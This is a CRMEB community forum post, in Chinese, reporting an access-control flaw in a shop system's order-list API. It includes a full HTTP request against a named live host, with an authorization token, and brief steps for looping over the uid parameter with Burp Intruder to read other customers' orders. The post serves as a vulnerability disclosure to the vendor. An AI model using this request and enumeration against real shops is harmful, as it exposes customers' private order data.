推荐应用

【标准版】新零售社交电商商城系统,易二开更便捷
【标准版】新零售社交电商商城系统,易二开更便捷
 【Pro版】高性能私域营销电商商城系统,多营销全渠道
【Pro版】高性能私域营销电商商城系统,多营销全渠道
 【多商户】商家入驻多业态电商平台系统,B2B2C多模式
【多商户】商家入驻多业态电商平台系统,B2B2C多模式
 【Java多商户】CRMEB多商户JAVA版
【Java多商户】CRMEB多商户JAVA版
全部
常见问题
产品动态
精选推荐

安全隐患-商城订单详细处存在越权漏洞

管理 管理 编辑 删除
张添华 Java单商户 v 2.0 2024-04-19 15:13:30
其他

ga通报

/api/front/order/list?type=4&page=1&limit=20&uid=9123


GET /api/front/order/list?type=4&page=1&limit=20&uid=1422 HTTP/1.1

Host: api1.mallmp.jhykyy.cn

Connection: keep-alive

charset: utf-8

User-Agent: Mozilla/5.0 (Linux; Android 12; SM-S9080 Build/V417IR; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.114 Mobile Safari/537.36 MMWEBID/4781 MicroMessenger/8.0.48.2580(0x2800303F) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android

content-type: application/json

Accept-Encoding: gzip, deflate, br

authori-zation: 1eef400f88414a05890a83cbadcf03f6

Referer: https://servicewechat.com/wxf9424287a3ae96af/33/page-frame.html


(5)把数据包发到intruder,遍历uid

(6)把uid值改为获取的值,打开抓包,点击查询详细

请登录后查看

Java单商户

张添华 最后编辑于2024-04-19 15:13:30

快捷回复
回复({{post_count}}) {{!is_user ? '我的回复' :'全部回复'}}
回复从新到旧

{{item.user_info.nickname ? item.user_info.nickname : item.user_name}}

作者 管理员 企业

{{item.floor}}# 同步到gitee 已同步到gitee {{item.is_suggest==1? '取消推荐': '推荐'}}
{{item.floor}}#
{{item.user_info.title}}
附件

{{itemf.name}}

下载
{{item.created_at}}  {{item.ip_address}}
{{item.like_count}}
{{item.showReply ? '取消回复' : '回复'}}
删除
回复
回复

{{itemc.user_info.nickname}}

{{itemc.user_name}}

作者 管理员 企业

回复 {{itemc.comment_user_info.nickname}}

附件

{{itemf.name}}

下载
{{itemc.created_at}}   {{itemc.ip_address}}
{{itemc.like_count}}
{{itemc.showReply ? '取消回复' : '回复'}}
删除
回复
回复
查看更多
回复
回复
147
{{like_count}}
{{collect_count}}
添加回复 ({{post_count}})

相关推荐

后台订单条件搜索列表返回错误
1877
2018/12/09
公众号订单数量不匹配
1717
2018/12/09
订单列表页面增加图片
1952
2018/12/12
小程序支付成功,但没有生成订单。
2095
2018/12/13
商品销售数量计算错误及订单数据加载错误
2160
2018/12/14
订单-->订单管理功能的一些值没有显示出来,是什么原因?其...
2310
2018/12/14
CRMEB商城订单管理 —— 订单查看管理
3338
2018/12/17
商品修改价格后,订单金额也会跟着变化
1699
2018/12/17
CRMEB商城订单管理 —— 订单发货、送货、退款操作
3068
2018/12/17
订单管理分页及excel导出bug
2357
2018/12/20

推荐应用

【标准版】新零售社交电商商城系统,易二开更便捷
【标准版】新零售社交电商商城系统,易二开更便捷
 【Pro版】高性能私域营销电商商城系统,多营销全渠道
【Pro版】高性能私域营销电商商城系统,多营销全渠道
 【多商户】商家入驻多业态电商平台系统,B2B2C多模式
【多商户】商家入驻多业态电商平台系统,B2B2C多模式
 【Java多商户】CRMEB多商户JAVA版
【Java多商户】CRMEB多商户JAVA版
张添华 作者
暂无简介

回答

0

发布

1

经验

4920

热门应用
家政系统V2.0城市代理版,用户+服务人员+门店+城市代理多端管理,兼容多种模式产品级开发,开发者文档齐全,便于二开
家政系统V2.0城市代理版,用户+服务人员+门店+城市代理多端管理,兼容多种模式产品级开发,开发者文档齐全,便于二开
热度 331
无人自助棋牌/桌球系统
无人自助棋牌/桌球系统
热度 495
基于crmeb知识付费重构uniappApp,小程序,H5系统
基于crmeb知识付费重构uniappApp,小程序,H5系统
热度 6075
陪诊陪护系统,包含陪护人员端,便捷的预约管理。产品级开发,开发者文档齐全,便于二开
陪诊陪护系统,包含陪护人员端,便捷的预约管理。产品级开发,开发者文档齐全,便于二开
热度 1437
【鑫店】社区团购团店团批配送电商小程序系统源码
【鑫店】社区团购团店团批配送电商小程序系统源码
热度 10172
租车系统V2.0版本,全流程管理下属门店及车辆资源,提供信用免押配置接口产品级开发,开发者文档齐全,便于二开
租车系统V2.0版本,全流程管理下属门店及车辆资源,提供信用免押配置接口产品级开发,开发者文档齐全,便于二开
热度 648
热门文章
一套图标有点少?CRMEB 五一劳动节图标再加一套😎😎快来下载~
{{numSaveThousand(25567)}} 阅读
18 评论
CRMEB 多商户 Java版v1.5公测版发布,产品经理在线等反馈,快来体验🔥🔥
{{numSaveThousand(10234)}} 阅读
36 评论
Uncaught Error: Class 'Swoole\Table' not found in /www/wwwroot/www.xx.co...
{{numSaveThousand(16748)}} 阅读
2 评论
CRMEB视频号产品功能大讲堂来了🔥~ 欢迎关注
{{numSaveThousand(8799)}} 阅读
7 评论
详细解析价格策略包括哪些方面
{{numSaveThousand(10198)}} 阅读
0 评论
CRMEB技术社区2024年第一季度大神排行榜
{{numSaveThousand(8306)}} 阅读
37 评论
微信支付显示当前交易异常,保障你的资金安全,暂无法完成支付
{{numSaveThousand(30594)}} 阅读
1 评论
CRMEB 多店版 v3.0更新预告,新鲜出炉🔥🔥
{{numSaveThousand(7583)}} 阅读
161 评论
热门标签
{{item.title}}

扫一扫关注公众号

CRMEB社区

官方网站 帮助文档 关于我们 新闻动态
合作伙伴 站点地图 应用市场 服务支持

陕ICP备14011498号-3

增值电信业务经营许可证:陕B2-20210243

客服电话:400-8888-794

版权所有:西安众邦网络科技有限公司

公司地址:陕西省咸阳市秦都区能源金融贸易区4区C座

© 2014-2023 CRMEB

快速安全登录

使用微信扫码登录
{{item.label}} {{item.label}} {{item.label}} 板块推荐 常见问题 产品动态 精选推荐 首页头条 首页动态 首页推荐
加精
取 消 确 定
回复
回复
问题:
问题自动获取的帖子内容,不准确时需要手动修改. [获取答案]
答案:
提交
 bug 需求 取 消 确 定

微信登录/注册

切换手机号登录

{{ bind_phone ? '绑定手机' : '手机登录'}}

{{codeText}}
切换微信登录/注册
暂不绑定
CRMEB客服

CRMEB咨询热线 咨询热线

400-8888-794

微信扫码咨询

CRMEB开源商城下载 开源下载 CRMEB官方论坛 帮助文档
返回顶部 返回顶部
CRMEB客服